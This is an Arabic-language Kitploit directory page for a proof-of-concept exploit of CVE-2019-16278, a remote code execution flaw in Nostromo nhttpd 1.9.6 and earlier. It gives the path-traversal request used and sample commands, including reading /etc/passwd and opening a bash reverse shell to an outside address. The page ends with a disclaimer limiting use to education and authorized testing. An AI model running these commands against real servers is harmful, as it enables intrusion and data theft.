Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2019-16278 — استغلال PoC لثغرة تنفيذ الأوامر عن بُعد (RCE) في Nostromo nhttpd ≤ 1.9.6 | Kitploit
أدوات/GitHubGitHub/andknownmaly/cve-2019-16278
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubandknownmaly/cve-2019-16278

CVE-2019-16278

استغلال PoC لثغرة تنفيذ الأوامر عن بُعد (RCE) في Nostromo nhttpd ≤ 1.9.6

عرض المستودع
3منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2019-16278 - Nostromo nhttpd RCE

وصف الثغرة

ثغرة تنفيذ برمجيات عن بُعد (Remote Code Execution) في إصدارات Nostromo nhttpd الأقدم من أو المساوية للإصدار 1.9.6 عبر اجتياز المسار (directory traversal) في معالجة طلبات HTTP.

الإصدارات المتأثرة

  • Nostromo nhttpd 1.9.6 والإصدارات الأقدم

تفاصيل الاستغلال

يستغل هذا الاستغلال ثغرة اجتياز المسار باستخدام أحرف CRLF المرمزة عبر URL (%0d) للوصول إلى /bin/sh وتنفيذ أوامر عشوائية.

كيف يعمل:

  1. يرسل طلب POST مع اجتياز المسار: /.%0d./.%0d./.%0d./.%0d./bin/sh
  2. يستخدم ترويسة Content-Length للتحكم في حجم الحمولة
  3. ينفّذ الأوامر عبر إعادة توجيه الصدفة: echo\necho\n<command> 2>&1

الاستخدام

root@kitploit:~
python3 cve-2019-16278.py <TARGET_IP> <PORT> <COMMAND>

مثال:

root@kitploit:~
python3 cve-2019-16278.py 192.168.1.100 80 "id"
python3 cve-2019-16278.py 10.10.10.10 8080 "cat /etc/passwd"
python3 cve-2019-16278.py target.com 80 "whoami"
python3 cve-2019-16278.py 10.10.10.10 80 "bash -c 'bash -i >& /dev/tcp/10.10.20.20/4444 0>&1'"

يوصى باستخدام القشرة العكسية (Reverse shell)، ففي بعض الأحيان لا يُظهر هذا السكربت شيئًا.

المتطلبات

  • Python 3
  • وصول شبكي إلى الخادم الهدف
  • تشغيل الهدف لإصدار معرّض للثغرة من Nostromo nhttpd

المراجع

  • CVE: CVE-2019-16278
  • https://www.exploit-db.com/exploits/47837
  • https://nvd.nist.gov/vuln/detail/CVE-2019-16278

إخلاء مسؤولية

هذه الأداة مخصصة للأغراض التعليمية واختبار الاختراق المصرح به فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني.

تنزيل الأداة